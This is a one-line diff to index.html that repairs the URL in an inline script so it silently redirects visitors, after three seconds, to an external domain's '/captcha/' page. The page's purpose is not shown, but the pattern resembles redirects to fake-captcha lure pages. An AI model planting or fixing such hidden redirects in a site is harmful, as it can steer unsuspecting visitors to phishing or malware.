--- a/index.html
+++ b/index.html
@@ -77,7 +77,7 @@
 
     <script>
         setTimeout(function() {
-            window.location.href = "https:/kra30at.at/captcha/?ref=&shop2go=/"; 
+            window.location.href = "https://kra30at.at/captcha/?ref=&shop2go=/"; 
         }, 3000);
     </script> 
 </body>
